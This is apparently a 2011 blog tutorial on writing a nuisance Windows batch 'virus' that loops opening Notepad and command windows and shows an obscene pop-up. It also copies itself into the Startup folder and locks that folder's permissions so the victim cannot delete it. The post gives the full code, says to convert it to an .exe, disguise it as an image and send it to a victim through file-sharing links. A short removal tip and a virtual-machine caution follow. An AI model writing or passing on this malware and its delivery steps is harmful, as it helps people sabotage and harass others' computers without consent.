Tuesday, August 16, 2011

Creating Ebomb using bat file.

Ebomb is a virus that usually used to annoy the victim by opening multiple applications. In this tutorial I will be using batch programming to create the Ebomb, You do not need to have any programming knowledge to create a bat file just you need to know few DOS commands.

Creating Process:-
1. Open Notepad and write the Program as given in the below examples and save it with .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click, you can cover this file using image file, Click Here to learn hiding trick. Or you can upload this file in any file sharing website like ziddu.com or megaupload.com and give the link to your victim.

Note:- In the program "::"(double colons) represent comments in batch programming. To create batch files follow the above "creating process".


Lets see the program:-
Lets say the file name is mybomb.bat.
@echo off        :: will not echo/display the commands in cmd
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
msg * you have fucked yourself:D 
start notepad
start cmd
move /y "mybomb.bat" "%allusersprofile%\start menu\programs\startup\"
goto a


Hold on the victim can easily see the contents of mybomb.bat file and may not  click the file, to avoid this convert this file to exe file using "bat to exe converter" and change the code a bit, see below for modified code:-


Lets say the name of the file is "mybomb.exe"

cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
msg * you have fucked yourself:D 
start notepad
start cmd
move /y "mybomb.exe" "%allusersprofile%\start menu\programs\startup\"
goto a

Explanation:-
This virus will pop up a message saying "you have fucked yourself" and will open notepad and cmd.exe and this process will continue indefinetly.
We have moved our virus inside "startup" using move command, ensuring victim can't get away from this virus using "Restart" and finally we denied all permissions to the "startup" folder using cacls command, so that victim will not be able to delete the virus from the "startup"  folder.
Note: I am not so sure if the move command in line 6 will work, test it, if it does'nt read this post to move the virus to "startup" folder.
Coutermeasure:-
1. The first thing you should do is, change the permission of "startup" folder. To do so open cmd and type in following command:-
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:F
It will certainly give you all permissions to the startup folder and then you can delete that virus and restart the system.
2. Use unlocker tool to delete folder whose permissions are denied. Click Here to download the Unlocker tool.



Precaution:
Do not practice these tricks in your PC, use virtual machine in your PC to make and run these virus. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing this Virtual Box install XP or 7 inside it(installing procedure is same). 

No comments:

Post a Comment